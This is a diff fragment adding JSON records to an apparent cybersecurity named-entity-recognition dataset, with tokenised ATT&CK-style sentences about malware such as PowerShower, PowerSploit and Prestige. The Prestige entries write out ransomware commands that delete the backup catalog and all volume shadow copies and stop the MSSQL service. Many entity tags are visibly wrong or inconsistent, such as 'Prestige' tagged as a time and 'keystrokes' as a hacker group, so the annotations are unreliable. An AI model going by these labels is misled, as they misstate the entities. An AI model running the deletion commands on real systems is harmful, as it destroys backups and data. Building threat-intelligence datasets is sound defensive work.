"list", + "the", + "victim's", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "achieves", + "persistence", + "by", + "using", + "various", + "Registry", + "Run", + "keys." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way" + ] + }, + { + "tokens": [ + "PowerDuke", + "uses", + "rundll32.exe", + "to", + "load." + ], + "ner_tags": [ + "B-Way", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "uses", + "steganography", + "to", + "hide", + "backdoors", + "in", + "PNG", + "files,", + "which", + "are", + "also", + "encrypted", + "using", + "the", + "Tiny", + "Encryption", + "Algorithm", + "(TEA)." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "commands", + "to", + "get", + "information", + "about", + "the", + "victim's", + "name,", + "build,", + "version,", + "serial", + "number,", + "and", + "memory", + "usage." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "a", + "command", + "to", + "get", + "the", + "victim's", + "domain", + "and", + "NetBIOS", + "name." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "commands", + "to", + "get", + "the", + "current", + "user's", + "name", + "and", + "SID." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "has", + "commands", + "to", + "get", + "the", + "time", + "the", + "machine", + "was", + "built,", + "the", + "time,", + "and", + "the", + "time", + "zone." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerDuke", + "runs", + "<code>cmd.exe", + "/c</code>", + "and", + "sends", + "the", + "output", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "encrypt", + "browser", + "database", + "files", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "has", + "a", + "browser", + "info", + "stealer", + "module", + "that", + "can", + "read", + "Chrome", + "and", + "Edge", + "browser", + "database", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "has", + "the", + "ability", + "to", + "exfiltrate", + "data,", + "including", + "Chrome", + "and", + "Edge", + "browser", + "database", + "files,", + "from", + "compromised", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "use", + "base64", + "and", + "AES", + "ECB", + "decryption", + "prior", + "to", + "execution", + "of", + "downloaded", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "use", + "an", + "encrypted", + "channel", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "download", + "additional", + "payloads", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "use", + "a", + "module", + "to", + "log", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PowerLess", + "can", + "stage", + "stolen", + "browser", + "data", + "in", + "`C:\\\\Windows\\\\Temp\\\\cup.tmp`", + "and", + "keylogger", + "data", + "in", + "`C:\\\\Windows\\\\Temp\\\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerLess", + "is", + "written", + "in", + "and", + "executed", + "via", + "PowerShell", + "without", + "using", + "powershell.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "PowerPunch", + "can", + "use", + "Base64-encoded", + "scripts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "PowerPunch", + "can", + "use", + "the", + "volume", + "serial", + "number", + "from", + "a", + "target", + "host", + "to", + "generate", + "a", + "unique", + "XOR", + "key", + "for", + "the", + "next", + "stage", + "payload." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerPunch", + "can", + "download", + "payloads", + "from", + "adversary", + "infrastructure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerPunch", + "has", + "the", + "ability", + "to", + "execute", + "through", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "used", + "7Zip", + "to", + "compress", + ".txt,", + ".pdf,", + ".xls", + "or", + ".doc", + "files", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "used", + "a", + "PowerShell", + "document", + "stealer", + "module", + "to", + "pack", + "and", + "exfiltrate", + ".txt,", + ".pdf,", + ".xls", + "or", + ".doc", + "files", + "smaller", + "than", + "5MB", + "that", + "were", + "modified", + "during", + "the", + "past", + "two", + "days." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "remove", + "all", + "files", + "created", + "during", + "the", + "dropper", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "added", + "a", + "registry", + "key", + "so", + "future", + "powershell.exe", + "instances", + "are", + "spawned", + "with", + "coordinates", + "for", + "a", + "window", + "position", + "off-screen", + "by", + "default." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "added", + "a", + "registry", + "key", + "so", + "future", + "powershell.exe", + "instances", + "are", + "spawned", + "off-screen", + "by", + "default,", + "and", + "has", + "removed", + "all", + "registry", + "entries", + "that", + "are", + "left", + "behind", + "during", + "the", + "dropper", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "is", + "a", + "backdoor", + "written", + "in", + "PowerShell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "deploy", + "a", + "reconnaissance", + "module", + "to", + "retrieve", + "a", + "list", + "of", + "the", + "active", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "sets", + "up", + "persistence", + "with", + "a", + "Registry", + "run", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "encode", + "C2", + "communications", + "with", + "base64", + "encoding." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "collected", + "system", + "information", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "identify", + "the", + "current", + "Windows", + "domain", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "identify", + "the", + "current", + "user", + "on", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "the", + "ability", + "to", + "save", + "and", + "execute", + "VBScript." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PowerShower", + "has", + "sent", + "HTTP", + "GET", + "and", + "POST", + "requests", + "to", + "C2", + "servers", + "to", + "send", + "information", + "and", + "receive", + "instructions." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Invoke-TokenManipulation</code>", + "Exfiltration", + "module", + "can", + "be", + "used", + "to", + "manipulate", + "tokens." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Get-MicrophoneAudio</code>", + "Exfiltration", + "module", + "can", + "record", + "system", + "microphone", + "audio." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "ScriptModification", + "modules", + "that", + "compress", + "and", + "encode", + "scripts", + "and", + "payloads." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "has", + "several", + "modules", + "that", + "search", + "the", + "Windows", + "Registry", + "for", + "stored", + "credentials:", + "<code>Get-UnattendedInstallFile</code>,", + "<code>Get-Webconfig</code>,", + "<code>Get-ApplicationHost</code>,", + "<code>Get-SiteListPassword</code>,", + "<code>Get-CachedGPPPassword</code>,", + "and", + "<code>Get-RegistryAutoLogon</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "DLL", + "hijacking", + "opportunities", + "in", + "services", + "and", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Exfiltration", + "modules", + "that", + "can", + "access", + "data", + "from", + "local", + "files,", + "volumes,", + "and", + "processes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "has", + "modules", + "such", + "as", + "<code>Get-NetDomainTrust</code>", + "and", + "<code>Get-NetForestTrust</code>", + "to", + "enumerate", + "domain", + "and", + "forest", + "trusts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Idus", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "CodeExecution", + "modules", + "that", + "inject", + "code", + "(DLL,", + "shellcode)", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Exfiltration", + "modules", + "that", + "can", + "harvest", + "credentials", + "from", + "Group", + "Policy", + "Preferences." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Find-AVSignature</code>", + "AntivirusBypass", + "module", + "can", + "be", + "used", + "to", + "locate", + "single", + "byte", + "anti-virus", + "signatures." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Invoke-Kerberoast</code>", + "module", + "can", + "request", + "service", + "tickets", + "and", + "return", + "crackable", + "ticket", + "hashes." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Get-Keystrokes</code>", + "Exfiltration", + "module", + "can", + "log", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Exfiltration", + "modules", + "that", + "can", + "harvest", + "credentials", + "using", + "Mimikatz." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Get-ProcessTokenGroup</code>", + "Privesc-PowerUp", + "module", + "can", + "enumerate", + "all", + "SIDs", + "associated", + "with", + "its", + "current", + "token." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "path", + "interception", + "opportunities", + "in", + "the", + "PATH", + "environment", + "variable." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "search", + "order", + "hijacking", + "vulnerabilities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-OffAct", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "discover", + "and", + "exploit", + "unquoted", + "path", + "vulnerabilities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "modules", + "are", + "written", + "in", + "and", + "executed", + "via", + "PowerShell." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Get-ProcessTokenPrivilege</code>", + "Privesc-PowerUp", + "module", + "can", + "enumerate", + "privileges", + "for", + "a", + "given", + "process." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "query", + "Registry", + "keys", + "for", + "potential", + "opportunities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "reflectively", + "loads", + "a", + "Windows", + "PE", + "file", + "into", + "a", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>New-UserPersistenceOption</code>", + "Persistence", + "argument", + "can", + "be", + "used", + "to", + "establish", + "via", + "the", + "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "Registry", + "key." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>New-UserPersistenceOption</code>", + "Persistence", + "argument", + "can", + "be", + "used", + "to", + "establish", + "via", + "a", + "Scheduled", + "Task/Job." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Get-TimedScreenshot</code>", + "Exfiltration", + "module", + "can", + "take", + "screenshots", + "at", + "regular", + "intervals." + ], + "ner_tags": [ + "B-SamFile", + "B-Way", + "B-SamFile", + "I-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Install-SSP</code>", + "Persistence", + "module", + "can", + "be", + "used", + "to", + "establish", + "by", + "installing", + "a", + "SSP", + "DLL." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Exfiltration", + "modules", + "that", + "can", + "harvest", + "credentials", + "from", + "Windows", + "vault", + "credential", + "objects." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit's", + "<code>Invoke-WmiCommand</code>", + "CodeExecution", + "module", + "uses", + "WMI", + "to", + "execute", + "and", + "retrieve", + "the", + "output", + "from", + "a", + "PowerShell", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerSploit", + "contains", + "a", + "collection", + "of", + "Privesc-PowerUp", + "modules", + "that", + "can", + "discover", + "and", + "replace/modify", + "service", + "binaries,", + "paths,", + "and", + "configs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerStallion", + "uses", + "Microsoft", + "OneDrive", + "as", + "a", + "C2", + "server", + "via", + "a", + "network", + "drive", + "mapped", + "with", + "<code>net", + "use</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerStallion", + "uses", + "a", + "XOR", + "cipher", + "to", + "encrypt", + "command", + "output", + "written", + "to", + "its", + "OneDrive", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "PowerStallion", + "uses", + "PowerShell", + "loops", + "to", + "iteratively", + "check", + "for", + "available", + "commands", + "in", + "its", + "OneDrive", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "PowerStallion", + "has", + "been", + "used", + "to", + "monitor", + "process", + "lists." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "PowerStallion", + "modifies", + "the", + "MAC", + "times", + "of", + "its", + "local", + "log", + "files", + "to", + "match", + "that", + "of", + "the", + "victim's", + "desktop.ini", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "leveraged", + "the", + "CryptoPP", + "C++", + "library", + "to", + "encrypt", + "files", + "on", + "target", + "systems", + "using", + "AES", + "and", + "appended", + "filenames", + "with", + "`.enc`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Prestige", + "can", + "traverse", + "the", + "file", + "system", + "to", + "discover", + "files", + "to", + "encrypt", + "by", + "identifying", + "specific", + "extensions", + "defined", + "in", + "a", + "hardcoded", + "list." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "been", + "deployed", + "using", + "the", + "Default", + "Domain", + "Group", + "Policy", + "Object", + "from", + "an", + "Active", + "Directory", + "Domain", + "Controller." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "can", + "delete", + "the", + "backup", + "catalog", + "from", + "the", + "target", + "system", + "using:", + "`c:\\Windows\\System32\\wbadmin.exe", + "delete", + "catalog", + "-quiet`", + "and", + "can", + "also", + "delete", + "volume", + "shadow", + "copies", + "using:", + "`\\Windows\\System32\\vssadmin.exe", + "delete", + "shadows", + "/all", + "/quiet`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "the", + "ability", + "to", + "register", + "new", + "registry", + "keys", + "for", + "a", + "new", + "extension", + "handler", + "via", + "`HKCR\\.enc`", + "and", + "`HKCR\\enc\\shell\\open\\command`." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "used", + "the", + "`Wow64DisableWow64FsRedirection()`", + "and", + "`Wow64RevertWow64FsRedirection()`", + "functions", + "to", + "disable", + "and", + "restore", + "file", + "system", + "redirection." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "can", + "use", + "PowerShell", + "for", + "payload", + "execution", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "been", + "executed", + "on", + "a", + "target", + "system", + "through", + "a", + "scheduled", + "task", + "created", + "by", + "Sandworm", + "Team", + "using", + "Impacket." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O" + ] + }, + { + "tokens": [ + "Prestige", + "has", + "attempted", + "to", + "stop", + "the", + "MSSQL", + "Windows", + "service", + "to", + "ensure", + "successful", + "encryption", + "using", + "`C:\\Windows\\System32\\net.exe", + "stop", + "MSSQLSERVER`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "collecting", + "documents", + "from", + "removable", + "media,", + "Prikormka", + "compresses", + "the", + "collected", + "files,", + "and", + "encrypts", + "it", + "with", + "Blowfish." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "collects", + "passwords", + "stored", + "in", + "applications", + "installed", + "on", + "the", + "victim." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "module", + "in", + "Prikormka", + "gathers", + "logins", + "and", + "passwords", + "stored", + "in", + "applications", + "on", + "the", + "victims,", + "including", + "Google", + "Chrome,", + "Mozilla", + "Firefox,", + "and", + "several", + "other", + "browsers." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "uses", + "DLL", + "search", + "order", + "hijacking", + "for", + "persistence", + "by", + "saving", + "itself", + "as", + "ntshrui.dll", + "to", + "the", + "Windows", + "directory", + "so", + "it", + "will", + "load", + "before", + "the", + "legitimate", + "ntshrui.dll", + "saved", + "in", + "the", + "System32", + "subdirectory." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Prikormka", + "contains", + "a", + "module", + "that", + "collects", + "documents", + "with", + "certain", + "extensions", + "from", + "removable", + "media", + "or", + "fixed", + "drives", + "connected", + "via", + "USB." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "resources", + "in", + "Prikormka", + "are", + "encrypted", + "with", + "a", + 